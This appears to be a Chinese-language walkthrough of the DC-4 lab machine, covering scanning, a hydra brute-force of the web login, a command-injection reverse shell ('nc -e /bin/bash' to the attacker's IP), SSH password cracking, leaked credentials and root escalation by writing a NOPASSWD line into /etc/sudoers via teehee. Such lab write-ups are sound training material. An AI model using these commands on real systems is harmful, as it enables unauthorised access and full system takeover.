当前位置: 首页 > news >正文

靶机:DC-4

一、信息收集

1、主机发现

nmap 192.168.236.0/24

2、端口扫描

nmap 192.168.236.175 -p- -A

3、目录扫描

dirb http://192.168.236.175

二、漏洞探测

访问80端口,发现登录页面

尝试爆破密码

hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.236.175 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -Fhttp-post-form:指定使用 HTTP POST 请求方式。
"/login.php:username=^USER^&password=^PASS^:S=logout":指定登录页面地址 /login.php,并使用 username 和 password 作为参数名来传递用户名和密码。其中 ^USER^ 和 ^PASS^ 含义为在暴力破解过程之中将要用到的用户名和密码,而 :S=logout 则是指当程序返回值为 logout 时,认为破解成功并退出程序。
-F:如果成功的话,停止猜测其他密码。

登录

admin:happy

bp抓包,是命令执行

查看 /etc/passwd 文件

三、GetShell

反弹shell

radio=nc+-e/bin/bash+192.168.236.137+4444&submit=Run
nc -lvvp 4444

四、提权

切换为交互式shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

sudo -l 看一下,不知道密码

在 jim 用户下发现密码文件

下载到本地

python3 -m http.server
wget http://192.168.236.175:8000/old-passwords.bak

使用 hydra 破解

hydra -L users.txt -P old-passwords.bak ssh://192.168.236.175jim:jibril04

ssh 连接

ssh jim@192.168.236.175

在 /var/mail 下有一封信,发现 charles 用户的密码

charles:^xHhA&hvim0y

切换用户

查看具有 root 权限的命令

sudo -l

teehee是个小众的linux编辑器,执行以下命令,成功提权

echo 'charles ALL=(ALL:ALL) NOPASSWD:ALL' | sudo teehee -a /etc/sudoers
sudo su

查看flag


http://www.mrgr.cn/news/3341.html

相关文章:

  • 设计模式系列:策略模式的设计与实践
  • C#用户控件usercontrol中的子控件事件及属性的传递
  • 有哪些方法可以查看服务器是否配置了RAID?
  • IP in IP 协议
  • Qt QTextEdit调用append数据重复的问题
  • M-Fedya and Array(cf1793)
  • avalonia学习之按钮
  • Python爬虫图片:从入门到精通
  • startData
  • RabbitMQ与ElasticSearch面试
  • 5IUX极简主页搜索源码/自定义你的浏览器主页
  • Rust: 技术介绍
  • 【设计模式反模式:UML图示有那些常见误用?】
  • 计算机毕业设计选题推荐-养老院管理系统-Java/Python项目实战
  • 用户体验的优化:观测云在用户行为分析中的应用
  • wireshark启动之后找不到本地接口问题
  • 智慧楼宇公厕系统小程序,提高卫生间管理使用效率
  • Golang | Leetcode Golang题解之第343题整数拆分
  • wsl2安装ebpf教程
  • Redis远程字典服务器(9)—— 类型补充